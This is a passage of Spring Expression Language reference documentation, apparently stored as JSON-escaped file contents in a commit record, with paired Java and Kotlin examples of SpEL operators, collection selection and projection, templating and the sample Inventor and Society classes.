SimpleEvaluationContext.forReadWriteDataBinding().build()\n\n\tparser.parseExpression(\"name\").setValue(context, inventor, \"Aleksandar Seovic\")\n\n\t\/\/ alternatively\n\tval aleks = parser.parseExpression(\n\t\t\t\"name = 'Aleksandar Seovic'\").getValue(context, inventor, String::class.java)\n----\n\n\n[[expressions-types]]\n=== Types\n\nYou can use the special `T` operator to specify an instance of `java.lang.Class` (the\ntype). Static methods are invoked by using this operator as well. The\n`StandardEvaluationContext` uses a `TypeLocator` to find types, and the\n`StandardTypeLocator` (which can be replaced) is built with an understanding of the\n`java.lang` package. This means that `T()` references to types within `java.lang` do not need to be\nfully qualified, but all other type references must be. The following example shows how\nto use the `T` operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tClass dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class.class);\n\n\tClass stringClass = parser.parseExpression(\"T(String)\").getValue(Class.class);\n\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class::class.java)\n\n\tval stringClass = parser.parseExpression(\"T(String)\").getValue(Class::class.java)\n\n\tval trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean::class.java)\n----\n\n\n\n[[expressions-constructors]]\n=== Constructors\n\nYou can invoke constructors by using the `new` operator. You should use the fully qualified class name\nfor all but the primitive types (`int`, `float`, and so on) and String. The following\nexample shows how to use the `new` operator to invoke constructors:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor.class);\n\n\t\/\/create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor(\n\t\t\t\t'Albert Einstein', 'German'))\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor::class.java)\n\n\t\/\/create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext)\n----\n\n\n\n[[expressions-ref-variables]]\n=== Variables\n\nYou can reference variables in the expression by using the `#variableName` syntax. Variables\nare set by using the `setVariable` method on `EvaluationContext` implementations.\n\n[NOTE]\n====\nValid variable names must be composed of one or more of the following supported\ncharacters.\n\n* letters: `A` to `Z` and `a` to `z`\n* digits: `0` to `9`\n* underscore: `_`\n* dollar sign: `$`\n====\n\nThe following example shows how to use variables.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\tcontext.setVariable(\"newName\", \"Mike Tesla\");\n\n\tparser.parseExpression(\"name = #newName\").getValue(context, tesla);\n\tSystem.out.println(tesla.getName()) \/\/ \"Mike Tesla\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\tcontext.setVariable(\"newName\", \"Mike Tesla\")\n\n\tparser.parseExpression(\"name = #newName\").getValue(context, tesla)\n\tprintln(tesla.name) \/\/ \"Mike Tesla\"\n----\n\n\n[[expressions-this-root]]\n==== The `#this` and `#root` Variables\n\nThe `#this` variable is always defined and refers to the current evaluation object\n(against which unqualified references are resolved). The `#root` variable is always\ndefined and refers to the root context object. Although `#this` may vary as components of\nan expression are evaluated, `#root` always refers to the root. The following examples\nshow how to use the `#this` and `#root` variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ create an array of integers\n\tList<Integer> primes = new ArrayList<Integer>();\n\tprimes.addAll(Arrays.asList(2,3,5,7,11,13,17));\n\n\t\/\/ create parser and set variable 'primes' as the array of integers\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataAccess();\n\tcontext.setVariable(\"primes\", primes);\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?{...})\n\t\/\/ evaluates to [11, 13, 17]\n\tList<Integer> primesGreaterThanTen = (List<Integer>) parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ create an array of integers\n\tval primes = ArrayList<Int>()\n\tprimes.addAll(listOf(2, 3, 5, 7, 11, 13, 17))\n\n\t\/\/ create parser and set variable 'primes' as the array of integers\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataAccess()\n\tcontext.setVariable(\"primes\", primes)\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?{...})\n\t\/\/ evaluates to [11, 13, 17]\n\tval primesGreaterThanTen = parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context) as List<Int>\n----\n\n\n\n[[expressions-ref-functions]]\n=== Functions\n\nYou can extend SpEL by registering user-defined functions that can be called within the\nexpression string. The function is registered through the `EvaluationContext`. The\nfollowing example shows how to register a user-defined function:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMethod method = ...;\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"myFunction\", method);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval method: Method = ...\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"myFunction\", method)\n----\n\nFor example, consider the following utility method that reverses a string:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic abstract class StringUtils {\n\n\t\tpublic static String reverseString(String input) {\n\t\t\tStringBuilder backwards = new StringBuilder(input.length());\n\t\t\tfor (int i = 0; i < input.length(); i++) {\n\t\t\t\tbackwards.append(input.charAt(input.length() - 1 - i));\n\t\t\t}\n\t\t\treturn backwards.toString();\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tfun reverseString(input: String): String {\n\t\tval backwards = StringBuilder(input.length)\n\t\tfor (i in 0 until input.length) {\n\t\t\tbackwards.append(input[input.length - 1 - i])\n\t\t}\n\t\treturn backwards.toString()\n\t}\n----\n\nYou can then register and use the preceding method, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"reverseString\",\n\t\t\tStringUtils.class.getDeclaredMethod(\"reverseString\", String.class));\n\n\tString helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"reverseString\", ::reverseString::javaMethod)\n\n\tval helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String::class.java)\n----\n\n\n\n[[expressions-bean-references]]\n=== Bean References\n\nIf the evaluation context has been configured with a bean resolver, you can\nlook up beans from an expression by using the `@` symbol. The following example shows how\nto do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"@something\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"@something\").getValue(context)\n----\n\nTo access a factory bean itself, you should instead prefix the bean name with an `&` symbol.\nThe following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"&foo\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"&foo\").getValue(context)\n----\n\n\n[[expressions-operator-ternary]]\n=== Ternary Operator (If-Then-Else)\n\nYou can use the ternary operator for performing if-then-else conditional logic inside\nthe expression. The following listing shows a minimal example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String::class.java)\n----\n\nIn this case, the boolean `false` results in returning the string value `'falseExp'`. A more\nrealistic example follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tparser.parseExpression(\"name\").setValue(societyContext, \"IEEE\");\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\");\n\n\texpression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" +\n\t\t\t\"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\";\n\n\tString queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String.class);\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tparser.parseExpression(\"name\").setValue(societyContext, \"IEEE\")\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\")\n\n\texpression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" + \"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\"\n\n\tval queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String::class.java)\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n\nSee the next section on the Elvis operator for an even shorter syntax for the\nternary operator.\n\n\n\n[[expressions-operator-elvis]]\n=== The Elvis Operator\n\nThe Elvis operator is a shortening of the ternary operator syntax and is used in the\nhttp:\/\/www.groovy-lang.org\/operators.html#_elvis_operator[Groovy] language.\nWith the ternary operator syntax, you usually have to repeat a variable twice, as the\nfollowing example shows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes\"]\n----\n\tString name = \"Elvis Presley\";\n\tString displayName = (name != null ? name : \"Unknown\");\n----\n\nInstead, you can use the Elvis operator (named for the resemblance to Elvis' hair style).\nThe following example shows how to use the Elvis operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tString name = parser.parseExpression(\"name?:'Unknown'\").getValue(new Inventor(), String.class);\n\tSystem.out.println(name); \/\/ 'Unknown'\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval name = parser.parseExpression(\"name?:'Unknown'\").getValue(Inventor(), String::class.java)\n\tprintln(name) \/\/ 'Unknown'\n----\n\nThe following listing shows a more complex example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\tString name = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Nikola Tesla\n\n\ttesla.setName(null);\n\tname = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Elvis Presley\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\tvar name = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Nikola Tesla\n\n\ttesla.setName(null)\n\tname = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Elvis Presley\n----\n\n[NOTE]\n=====\nYou can use the Elvis operator to apply default values in expressions. The following\nexample shows how to use the Elvis operator in a `@Value` expression:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t@Value(\"#{systemProperties['pop3.port'] ?: 25}\")\n----\n\nThis will inject a system property `pop3.port` if it is defined or 25 if not.\n=====\n\n\n[[expressions-operator-safe-navigation]]\n=== Safe Navigation Operator\n\nThe safe navigation operator is used to avoid a `NullPointerException` and comes from\nthe http:\/\/www.groovy-lang.org\/operators.html#_safe_navigation_operator[Groovy]\nlanguage. Typically, when you have a reference to an object, you might need to verify that\nit is not null before accessing methods or properties of the object. To avoid this, the\nsafe navigation operator returns null instead of throwing an exception. The following\nexample shows how to use the safe navigation operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\ttesla.setPlaceOfBirth(new PlaceOfBirth(\"Smiljan\"));\n\n\tString city = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null);\n\tcity = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ null - does not throw NullPointerException!!!\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\ttesla.setPlaceOfBirth(PlaceOfBirth(\"Smiljan\"))\n\n\tvar city = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null)\n\tcity = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ null - does not throw NullPointerException!!!\n----\n\n\n\n[[expressions-collection-selection]]\n=== Collection Selection\n\nSelection is a powerful expression language feature that lets you transform a\nsource collection into another collection by selecting from its entries.\n\nSelection uses a syntax of `.?[selectionExpression]`. It filters the collection and\nreturns a new collection that contain a subset of the original elements. For example,\nselection lets us easily get a list of Serbian inventors, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tList<Inventor> list = (List<Inventor>) parser.parseExpression(\n\t\t\t\"members.?[nationality == 'Serbian']\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval list = parser.parseExpression(\n\t\t\t\"members.?[nationality == 'Serbian']\").getValue(societyContext) as List<Inventor>\n----\n\nSelection is possible upon both lists and maps. For a list, the selection\ncriteria is evaluated against each individual list element. Against a map, the\nselection criteria is evaluated against each map entry (objects of the Java type\n`Map.Entry`). Each map entry has its key and value accessible as properties for use in\nthe selection.\n\nThe following expression returns a new map that consists of those elements of the original map\nwhere the entry value is less than 27:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMap newMap = parser.parseExpression(\"map.?[value<27]\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval newMap = parser.parseExpression(\"map.?[value<27]\").getValue()\n----\n\n\nIn addition to returning all the selected elements, you can retrieve only the\nfirst or the last value. To obtain the first entry matching the selection, the syntax is\n`.^[selectionExpression]`. To obtain the last matching selection, the syntax is\n`.$[selectionExpression]`.\n\n\n\n[[expressions-collection-projection]]\n=== Collection Projection\n\nProjection lets a collection drive the evaluation of a sub-expression, and the\nresult is a new collection. The syntax for projection is `.![projectionExpression]`. For\nexample, suppose we have a list of inventors but want the list of\ncities where they were born. Effectively, we want to evaluate 'placeOfBirth.city' for\nevery entry in the inventor list. The following example uses projection to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ returns ['Smiljan', 'Idvor' ]\n\tList placesOfBirth = (List)parser.parseExpression(\"members.![placeOfBirth.city]\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ returns ['Smiljan', 'Idvor' ]\n\tval placesOfBirth = parser.parseExpression(\"members.![placeOfBirth.city]\") as List<*>\n----\n\nYou can also use a map to drive projection and, in this case, the projection expression is\nevaluated against each entry in the map (represented as a Java `Map.Entry`). The result\nof a projection across a map is a list that consists of the evaluation of the projection\nexpression against each map entry.\n\n\n\n[[expressions-templating]]\n=== Expression templating\n\nExpression templates allow mixing literal text with one or more evaluation blocks.\nEach evaluation block is delimited with prefix and suffix characters that you can\ndefine. A common choice is to use `#{ }` as the delimiters, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tnew TemplateParserContext()).getValue(String.class);\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tTemplateParserContext()).getValue(String::class.java)\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n\nThe string is evaluated by concatenating the literal text `'random number is '` with the\nresult of evaluating the expression inside the `#{ }` delimiter (in this case, the result\nof calling that `random()` method). The second argument to the `parseExpression()` method\nis of the type `ParserContext`. The `ParserContext` interface is used to influence how\nthe expression is parsed in order to support the expression templating functionality.\nThe definition of `TemplateParserContext` follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class TemplateParserContext implements ParserContext {\n\n\t\tpublic String getExpressionPrefix() {\n\t\t\treturn \"#{\";\n\t\t}\n\n\t\tpublic String getExpressionSuffix() {\n\t\t\treturn \"}\";\n\t\t}\n\n\t\tpublic boolean isTemplate() {\n\t\t\treturn true;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass TemplateParserContext : ParserContext {\n\n\t\toverride fun getExpressionPrefix(): String {\n\t\t\treturn \"#{\"\n\t\t}\n\n\t\toverride fun getExpressionSuffix(): String {\n\t\t\treturn \"}\"\n\t\t}\n\n\t\toverride fun isTemplate(): Boolean {\n\t\t\treturn true\n\t\t}\n\t}\n----\n\n\n[[expressions-example-classes]]\n== Classes Used in the Examples\n\nThis section lists the classes used in the examples throughout this chapter.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Inventor.Java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.Date;\n\timport java.util.GregorianCalendar;\n\n\tpublic class Inventor {\n\n\t\tprivate String name;\n\t\tprivate String nationality;\n\t\tprivate String[] inventions;\n\t\tprivate Date birthdate;\n\t\tprivate PlaceOfBirth placeOfBirth;\n\n\t\tpublic Inventor(String name, String nationality) {\n\t\t\tGregorianCalendar c= new GregorianCalendar();\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = c.getTime();\n\t\t}\n\n\t\tpublic Inventor(String name, Date birthdate, String nationality) {\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic Inventor() {\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic String getNationality() {\n\t\t\treturn nationality;\n\t\t}\n\n\t\tpublic void setNationality(String nationality) {\n\t\t\tthis.nationality = nationality;\n\t\t}\n\n\t\tpublic Date getBirthdate() {\n\t\t\treturn birthdate;\n\t\t}\n\n\t\tpublic void setBirthdate(Date birthdate) {\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic PlaceOfBirth getPlaceOfBirth() {\n\t\t\treturn placeOfBirth;\n\t\t}\n\n\t\tpublic void setPlaceOfBirth(PlaceOfBirth placeOfBirth) {\n\t\t\tthis.placeOfBirth = placeOfBirth;\n\t\t}\n\n\t\tpublic void setInventions(String[] inventions) {\n\t\t\tthis.inventions = inventions;\n\t\t}\n\n\t\tpublic String[] getInventions() {\n\t\t\treturn inventions;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Inventor.kt\n----\nclass Inventor(\n\tvar name: String,\n\tvar nationality: String,\n\tvar inventions: Array<String>? = null,\n\tvar birthdate: Date = GregorianCalendar().time,\n\tvar placeOfBirth: PlaceOfBirth? = null)\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.PlaceOfBirth.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\tpublic class PlaceOfBirth {\n\n\t\tprivate String city;\n\t\tprivate String country;\n\n\t\tpublic PlaceOfBirth(String city) {\n\t\t\tthis.city=city;\n\t\t}\n\n\t\tpublic PlaceOfBirth(String city, String country) {\n\t\t\tthis(city);\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getCity() {\n\t\t\treturn city;\n\t\t}\n\n\t\tpublic void setCity(String s) {\n\t\t\tthis.city = s;\n\t\t}\n\n\t\tpublic String getCountry() {\n\t\t\treturn country;\n\t\t}\n\n\t\tpublic void setCountry(String country) {\n\t\t\tthis.country = country;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.PlaceOfBirth.kt\n----\n\tclass PlaceOfBirth(var city: String, var country: String? = null) {\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Society.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.*;\n\n\tpublic class Society {\n\n\t\tprivate String name;\n\n\t\tpublic static String Advisors = \"advisors\";\n\t\tpublic static String President = \"president\";\n\n\t\tprivate List<Inventor> members = new ArrayList<Inventor>();\n\t\tprivate Map officers = new HashMap();\n\n\t\tpublic List getMembers() {\n\t\t\treturn members;\n\t\t}\n\n\t\tpublic Map getOfficers() {\n\t\t\treturn officers;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic boolean isMember(String name) {\n\t\t\tfor (Inventor inventor : members) {\n\t\t\t\tif (inventor.getName().equals(name)) {\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Society.kt\n----\n\tpackage org.spring.samples.spel.inventor\n\n\timport java.util.*\n\n\tclass Society {\n\n\t\tval Advisors = \"advisors\"\n\t\tval President = \"president\"\n\n\t\tvar name: String? = null\n\n\t\tval members = ArrayList<Inventor>()\n\t\tval officers = mapOf<Any, Any>()\n\n\t\tfun isMember(name: String): Boolean {\n\t\t\tfor (inventor in members) {\n\t\t\t\tif (inventor.name == name) {\n\t\t\t\t\treturn true\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n----\n","old_contents":"[[expressions]]\n= Spring Expression Language (SpEL)\n\nThe Spring Expression Language (\"`SpEL`\" for short) is a powerful expression language that\nsupports querying and manipulating an object graph at runtime. The language syntax is\nsimilar to Unified EL but offers additional features, most notably method invocation and\nbasic string templating functionality.\n\nWhile there are several other Java expression languages available -- OGNL, MVEL, and JBoss\nEL, to name a few -- the Spring Expression Language was created to provide the Spring\ncommunity with a single well supported expression language that can be used across all\nthe products in the Spring portfolio. Its language features are driven by the\nrequirements of the projects in the Spring portfolio, including tooling requirements\nfor code completion support within the https:\/\/spring.io\/tools[Spring Tools for Eclipse].\nThat said, SpEL is based on a technology-agnostic API that lets other expression language\nimplementations be integrated, should the need arise.\n\nWhile SpEL serves as the foundation for expression evaluation within the Spring\nportfolio, it is not directly tied to Spring and can be used independently. To\nbe self contained, many of the examples in this chapter use SpEL as if it were an\nindependent expression language. This requires creating a few bootstrapping\ninfrastructure classes, such as the parser. Most Spring users need not deal with\nthis infrastructure and can, instead, author only expression strings for evaluation.\nAn example of this typical use is the integration of SpEL into creating XML or\nannotation-based bean definitions, as shown in\n<<expressions-beandef, Expression support for defining bean definitions>>.\n\nThis chapter covers the features of the expression language, its API, and its language\nsyntax. In several places, `Inventor` and `Society` classes are used as the target\nobjects for expression evaluation. These class declarations and the data used to\npopulate them are listed at the end of the chapter.\n\nThe expression language supports the following functionality:\n\n* Literal expressions\n* Boolean and relational operators\n* Regular expressions\n* Class expressions\n* Accessing properties, arrays, lists, and maps\n* Method invocation\n* Relational operators\n* Assignment\n* Calling constructors\n* Bean references\n* Array construction\n* Inline lists\n* Inline maps\n* Ternary operator\n* Variables\n* User-defined functions\n* Collection projection\n* Collection selection\n* Templated expressions\n\n\n\n\n[[expressions-evaluation]]\n== Evaluation\n\nThis section introduces the simple use of SpEL interfaces and its expression language.\nThe complete language reference can be found in\n<<expressions-language-ref, Language Reference>>.\n\nThe following code introduces the SpEL API to evaluate the literal string expression,\n`Hello World`.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of the message variable is `'Hello World'`.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of the message variable is `'Hello World'`.\n\n\nThe SpEL classes and interfaces you are most likely to use are located in the\n`org.springframework.expression` package and its sub-packages, such as `spel.support`.\n\nThe `ExpressionParser` interface is responsible for parsing an expression string. In\nthe preceding example, the expression string is a string literal denoted by the surrounding single\nquotation marks. The `Expression` interface is responsible for evaluating the previously defined\nexpression string. Two exceptions that can be thrown, `ParseException` and\n`EvaluationException`, when calling `parser.parseExpression` and `exp.getValue`,\nrespectively.\n\nSpEL supports a wide range of features, such as calling methods, accessing properties,\nand calling constructors.\n\nIn the following example of method invocation, we call the `concat` method on the string literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'.concat('!')\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of `message` is now 'Hello World!'.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'.concat('!')\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of `message` is now 'Hello World!'.\n\nThe following example of calling a JavaBean property calls the `String` property 